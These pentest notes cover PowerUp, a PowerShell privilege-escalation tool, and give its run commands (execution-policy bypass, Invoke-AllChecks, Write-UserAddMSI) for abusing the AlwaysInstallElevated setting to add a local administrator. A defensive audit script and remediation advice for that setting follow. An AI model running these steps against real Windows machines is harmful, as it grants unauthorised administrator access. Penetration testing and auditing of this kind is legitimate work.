PS – PowerUp

PowerUp – https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

powershell.exe -exec bypass

Import-Module .\PowerUp.ps1

Invoke-AllChecks

If you see "AbuseFunction : Write-UserAddMSI" under "Checking for AlwaysInstallElevated registry key":

Let PowerUp finish, then copy and paste Write-UserAddMSI into PS. It will install a program that runs as admin and lets you add a user / password to the local admin group.

To check it has worked:

net localgroup administrators
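
The registry check behind that finding, as an added audit example (not part of PowerUp or of the original notes; the function name Test-AlwaysInstallElevated is made up here). The AlwaysInstallElevated policy only applies when the value is 1 under both HKLM and HKCU, so the script reads both hives and also lists the current local Administrators members for review.

```powershell
# Added audit example; Test-AlwaysInstallElevated is a hypothetical name.
function Test-AlwaysInstallElevated {
    [CmdletBinding()]
    param()

    $subKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = @{}

    foreach ($hive in 'HKLM', 'HKCU') {
        $path  = "${hive}:\$subKey"
        $value = $null                      # $null = key or value not present
        if (Test-Path -Path $path) {
            $item = Get-ItemProperty -Path $path -Name 'AlwaysInstallElevated' `
                        -ErrorAction SilentlyContinue
            if ($null -ne $item) { $value = $item.AlwaysInstallElevated }
        }
        $values[$hive] = $value
    }

    # Members of BUILTIN\Administrators, looked up by well-known SID so the
    # check also works on non-English systems where the group is renamed.
    try {
        $admins = Get-LocalGroupMember -SID 'S-1-5-32-544' -ErrorAction Stop |
                      Select-Object -ExpandProperty Name
    } catch {
        $admins = @("lookup failed: $($_.Exception.Message)")
    }

    [pscustomobject]@{
        HKLM        = $values['HKLM']
        HKCU        = $values['HKCU']
        # Standard users get elevated MSI installs only when both values are 1.
        Vulnerable  = ($values['HKLM'] -eq 1 -and $values['HKCU'] -eq 1)
        LocalAdmins = $admins
    }
}

Test-AlwaysInstallElevated | Format-List
```

If Vulnerable is True, set the "Always install with elevated privileges" Group Policy to Disabled or Not Configured in both Computer Configuration and User Configuration, then review LocalAdmins for accounts that should not be there.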

——

Extract from https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

function Write-UserAddMSI {
<#
    .SYNOPSIS
    Writes out a precompiled MSI installer that prompts for a user/group addition.
    This function can be used to abuse Get-RegAlwaysInstallElevated.

    .EXAMPLE
    PS C:\> Write-UserAddMSI
    Writes the user add MSI to the local directory.

——